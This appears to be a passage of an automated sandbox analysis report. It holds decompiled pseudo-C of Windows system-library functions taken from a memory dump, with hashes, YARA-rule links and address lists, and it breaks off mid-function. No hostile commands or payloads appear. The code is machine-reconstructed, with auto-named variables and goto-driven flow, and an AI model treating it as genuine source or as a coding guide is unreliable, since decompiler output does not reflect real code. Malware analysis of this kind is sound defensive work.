            • Instruction ID: ee30e6ba3135732001f234be150a3fbdbcd968122205c1c13583f48e7c3c949e
            • Opcode Fuzzy Hash: 67e9a4f2585a77eca1eb389b268c821ed94e88232f534921918eb689750e4ad0
            • Instruction Fuzzy Hash: C3512471A083808FEB20DF69C48092BBBE5FBC8604F14896EE58597395E770F944CB92
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
            Download Yara Rule
            C-Code - Quality: 78%
            			E0442B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x44ff7a8);
				E0447D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0447D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0446D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0446F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0447DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0446B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0446B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0446E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0446A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















            0x0442b171
            0x0442b171
            0x0442b171
            0x0442b171
            0x0442b171
            0x0442b176
            0x0442b17b
            0x0442b180
            0x0442b186
            0x0442b18f
            0x0442b198
            0x0442b1a4
            0x0442b1aa
            0x04484802
            0x04484802
            0x04484805
            0x0448480c
            0x0448480e
            0x0442b1d1
            0x0442b1d3
            0x0442b1de
            0x0442b1de
            0x04484817
            0x0448481e
            0x04484820
            0x04484822
            0x04484822
            0x04484824
            0x04484824
            0x0448482a
            0x00000000
            0x00000000
            0x04484835
            0x0448483a
            0x0448483d
            0x0448483f
            0x04484842
            0x04484842
            0x04484842
            0x04484846
            0x0448484c
            0x0448484e
            0x04484851
            0x04484851
            0x04484853
            0x04484854
            0x04484854
            0x04484858
            0x0448485a
            0x0448485a
            0x0448485d
            0x0448485f
            0x04484861
            0x04484861
            0x04484866
            0x0448486b
            0x0448486e
            0x04484871
            0x04484876
            0x04484876
            0x04484878
            0x0448487b
            0x04484884
            0x04484884
            0x00000000
            0x0448487d
            0x0448487d
            0x04484882
            0x04484889
            0x04484889
            0x0448488f
            0x04484891
            0x044848e0
            0x044848e2
            0x044848e4
            0x044848e4
            0x044848e7
            0x044848e7
            0x044848ed
            0x044848f4
            0x044848f6
            0x04484951
            0x04484951
            0x04484953
            0x04484953
            0x04484956
            0x04484956
            0x04484958
            0x04484959
            0x04484959
            0x0448495d
            0x0448495d
            0x0448495f
            0x0448495f
            0x04484965
            0x04484969
            0x044849ba
            0x044849ba
            0x044849c1
            0x044849c5
            0x044849cc
            0x044849d4
            0x044849d7
            0x044849da
            0x044849e4
            0x044849e5
            0x044849f3
            0x04484a02
            0x00000000
            0x04484a02
            0x04484972
            0x04484974
            0x00000000
            0x00000000
            0x04484976
            0x04484979
            0x04484982
            0x04484983
            0x04484984
            0x0448498b
            0x0448498d
            0x04484991
            0x04484993
            0x04484999
            0x0448499d
            0x044849a2
            0x044849a2
            0x044849a2
            0x04484999
            0x044849ac
            0x00000000
            0x044849b3
            0x044848f8
            0x044848fe
            0x00000000
            0x00000000
            0x00000000
            0x044848fe
            0x04484895
            0x0448489c
            0x044848ad
            0x044848b2
            0x044848b5
            0x044848b7
            0x044848ba
            0x044848bc
            0x044848c6
            0x044848c6
            0x044848cb
            0x044848d1
            0x044848d4
            0x044848d8
            0x044848d8
            0x00000000
            0x044848d8
            0x044848be
            0x044848c0
            0x00000000
            0x00000000
            0x044848c2
            0x00000000
            0x00000000
            0x00000000
            0x044848c4
            0x00000000
            0x04484882
            0x0448487b
            0x04484904
            0x04484906
            0x00000000
            0x00000000
            0x04484908
            0x0448490e
            0x00000000
            0x00000000
            0x04484910
            0x04484917
            0x04484917
            0x00000000
            0x04484917
            0x0442b1ba
            0x044847f9
            0x044847fc
            0x00000000
            0x00000000
            0x00000000
            0x044847fc
            0x0442b1c0
            0x0442b1c0
            0x0442b1c3
            0x0442b1cb
            0x00000000
            0x00000000
            0x00000000

            APIs
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: _vswprintf_s
            • String ID:
            • API String ID: 677850445-0
            • Opcode ID: 564be9e258565ac75aa8df2d48c3dde4e925e2dae4b9b7539ccae93242da716e
            • Instruction ID: fe69e845a9c091ec82d83288511f695365a25510284b84b42b47979e8f6cefbb
            • Opcode Fuzzy Hash: 564be9e258565ac75aa8df2d48c3dde4e925e2dae4b9b7539ccae93242da716e
            • Instruction Fuzzy Hash: 9551E175D0066A8EEF30EF74C844BAEBBB0AF00314F1041AFD859AB381E73069458B91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0445FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E0445FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0443EEF0(0x4517b60);
					_t134 =  *0x4517b84; // 0x776f7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4517b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4517b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04436D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E044376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E044C8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0442B150();
													}
													_t116 = E044C6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E044375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4518638; // 0x1828c0
																	_t122 = L044338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E044376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E044376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0445FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L044370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0445FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0445FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0445FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0445FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0445FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4517b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4517b84 = _t75;
						_t73 = E0443EB70(_t134, 0x4517b60);
						if( *0x4517b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0443FF60( *0x4517b20);
							}
						}
						goto L5;
					}
				}
			}

















































            0x0445fab0
            0x0445fab2
            0x0445fab3
            0x0445fab4
            0x0445fabc
            0x0445fac0
            0x0445fb14
            0x0445fb17
            0x0445fac2
            0x0445fac8
            0x0445facd
            0x0445fad3
            0x0445fad3
            0x0445fadd
            0x0445fb18
            0x0445fb1b
            0x0445fb1d
            0x0445fb1e
            0x0445fb1f
            0x0445fb20
            0x0445fb21
            0x0445fb22
            0x0445fb23
            0x0445fb24
            0x0445fb25
            0x0445fb26
            0x0445fb27
            0x0445fb28
            0x0445fb29
            0x0445fb2a
            0x0445fb2b
            0x0445fb2c
            0x0445fb2d
            0x0445fb2e
            0x0445fb2f
            0x0445fb3a
            0x0445fb3b
            0x0445fb3e
            0x0445fb41
            0x0445fb44
            0x0445fb47
            0x0445fb4a
            0x0445fb4d
            0x0445fb53
            0x0449bdcb
            0x0449bdcb
            0x0445fb59
            0x0445fb5b
            0x0445fb5b
            0x0445fb5e
            0x0449bdd5
            0x0449bdd8
            0x00000000
            0x0449bdda
            0x00000000
            0x0449bdda
            0x0445fb64
            0x0445fb64
            0x0445fb64
            0x0445fb67
            0x0445fb6e
            0x0445fb70
            0x0445fb72
            0x00000000
            0x0445fb78
            0x0445fb7a
            0x0445fb7a
            0x0445fb7d
            0x0445fb80
            0x0449bddf
            0x0449bde1
            0x00000000
            0x0449bde3
            0x00000000
            0x0449bde3
            0x0445fb86
            0x0445fb86
            0x0445fb86
            0x0445fb8b
            0x0445fb90
            0x0445fb92
            0x0445fb94
            0x0445fb9a
            0x0445fb9b
            0x0445fba1
            0x0449bde8
            0x0449bdeb
            0x0449bded
            0x0449beb5
            0x0449beb5
            0x0449bebb
            0x0449bebd
            0x0449bec3
            0x0449bed2
            0x0449bedd
            0x0449bedd
            0x0449beed
            0x00000000
            0x0449bdf3
            0x0449bdfe
            0x0449be06
            0x0449be0b
            0x0449be0d
            0x0449be0f
            0x0449be14
            0x0449be19
            0x0449be20
            0x0449be25
            0x0449be27
            0x0449be35
            0x0449be39
            0x0449be46
            0x0449be4f
            0x0449be54
            0x0449be56
            0x0449bef8
            0x0449bef8
            0x00000000
            0x0449be5c
            0x0449be5c
            0x0449be60
            0x00000000
            0x0449be66
            0x0449be66
            0x0449be7f
            0x0449be84
            0x0449be87
            0x0449be89
            0x0449be8b
            0x0449be99
            0x0449be9d
            0x0449bea0
            0x0449beac
            0x0449beaf
            0x0449beb1
            0x0449beb3
            0x0449beb3
            0x00000000
            0x0449bea2
            0x0449bea2
            0x00000000
            0x0449bea2
            0x0449be8d
            0x0449be8d
            0x0449be92
            0x00000000
            0x0449be92
            0x0449be8b
            0x0449be60
            0x0449be3b
            0x0449be3b
            0x0449be3e
            0x00000000
            0x0449be40
            0x0449be40
            0x0449be44
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0449be44
            0x0449be3e
            0x0449be29
            0x0449be29
            0x00000000
            0x0449be29
            0x0449be27
            0x00000000
            0x0445fba7
            0x0445fba7
            0x0445fbab
            0x0449bf02
            0x0445fbb1
            0x0445fbb1
            0x0445fbb8
            0x0445fbbd
            0x0445fbbd
            0x0445fbbf
            0x0445fbbf
            0x0445fbc5
            0x0445fbcb
            0x0445fbf8
            0x0445fbf8
            0x0445fbfa
            0x00000000
            0x0445fc00
            0x0445fc00
            0x0445fc03
            0x00000000
            0x0445fc09
            0x0445fc09
            0x0445fc0f
            0x0445fc15
            0x0445fc23
            0x0445fc23
            0x0445fc25
            0x0445fc27
            0x0445fc75
            0x0445fc7c
            0x0445fc84
            0x00000000
            0x0445fc29
            0x0445fc29
            0x0445fc2d
            0x0445fc30
            0x0449bf0f
            0x00000000
            0x0445fc36
            0x0445fc38
            0x0445fc3b
            0x0445fc41
            0x0449bf17
            0x0449bf19
            0x0449bf48
            0x0449bf4b
            0x00000000
            0x0449bf1b
            0x0449bf22
            0x0449bf24
            0x0449bf26
            0x00000000
            0x0449bf2c
            0x0449bf37
            0x0449bf39
            0x0449bf3b
            0x00000000
            0x0449bf41
            0x0449bf41
            0x0449bf41
            0x0449bf41
            0x0449bf45
            0x00000000
            0x0449bf45
            0x0449bf3b
            0x0449bf26
            0x00000000
            0x0445fc47
            0x0445fc47
            0x0445fc49
            0x0445fcb2
            0x0445fcb4
            0x0445fcb6
            0x0445fcdc
            0x0445fcdc
            0x00000000
            0x0445fcb8
            0x0445fcc3
            0x0445fcc5
            0x0445fcc7
            0x00000000
            0x0445fcc9
            0x0445fcc9
            0x0445fccd
            0x00000000
            0x0445fccd
            0x0445fcc7
            0x00000000
            0x0445fc4b
            0x0445fc4b
            0x0445fc4e
            0x0445fc4e
            0x0445fc51
            0x0445fc51
            0x0445fc54
            0x0445fc5a
            0x0445fc5c
            0x0445fc5f
            0x0445fc61
            0x0445fc63
            0x0445fc65
            0x0445fc67
            0x0445fc6e
            0x0445fc72
            0x0445fc72
            0x0445fc72
            0x0445fc72
            0x0445fc67
            0x0445fc61
            0x00000000
            0x0445fc5a
            0x0445fc49
            0x0445fc41
            0x0445fc30
            0x0445fc27
            0x0445fc03
            0x0445fbcd
            0x0445fbd3
            0x0445fbd9
            0x0445fbdc
            0x0445fbde
            0x0445fc99
            0x0445fc9b
            0x0445fc9d
            0x0445fcd5
            0x0445fcd5
            0x0445fc89
            0x0445fc89
            0x00000000
            0x0445fc9f
            0x0445fc9f
            0x0445fca3
            0x00000000
            0x0445fca3
            0x00000000
            0x0445fbe4
            0x0445fbe4
            0x0445fbe4
            0x0445fbe4
            0x0445fbe9
            0x0445fbf2
            0x00000000
            0x0445fbf2
            0x0445fbde
            0x0445fbcb
            0x0445fbab
            0x0445fc8b
            0x0445fc8b
            0x0445fc8c
            0x0445fb80
            0x0445fb72
            0x0445fb5e
            0x0445fc8d
            0x0445fc91
            0x0445fadf
            0x0445fadf
            0x0445fae1
            0x0445fae4
            0x0445fae7
            0x0445faec
            0x0445faf8
            0x0445fb00
            0x0445fb07
            0x0445fb0f
            0x0445fb0f
            0x0445fb07
            0x00000000
            0x0445faf8
            0x0445fadd

            Strings
            • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0449BE0F
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
            • API String ID: 0-865735534
            • Opcode ID: 3af3bab768e3409b2900d0dfc56a493bf7e092949cf76eb3a0c9680df09ae1af
            • Instruction ID: 32c551bb17e1b2822ce1c6ca5df999b008bce532e1d4270410857475aff8a8db
            • Opcode Fuzzy Hash: 3af3bab768e3409b2900d0dfc56a493bf7e092949cf76eb3a0c9680df09ae1af
            • Instruction Fuzzy Hash: 0BA1CF71B006468BEF269F69C450B6AB7B5FB48714F04457FDC468B7A2EB30F8099B81
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04422D8A, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
            Download Yara Rule
            C-Code - Quality: 63%
            			E04422D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4515350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4517bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E044697C0();
				}
				if( *0x45179c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x45179c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04451624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04447D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E044BFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
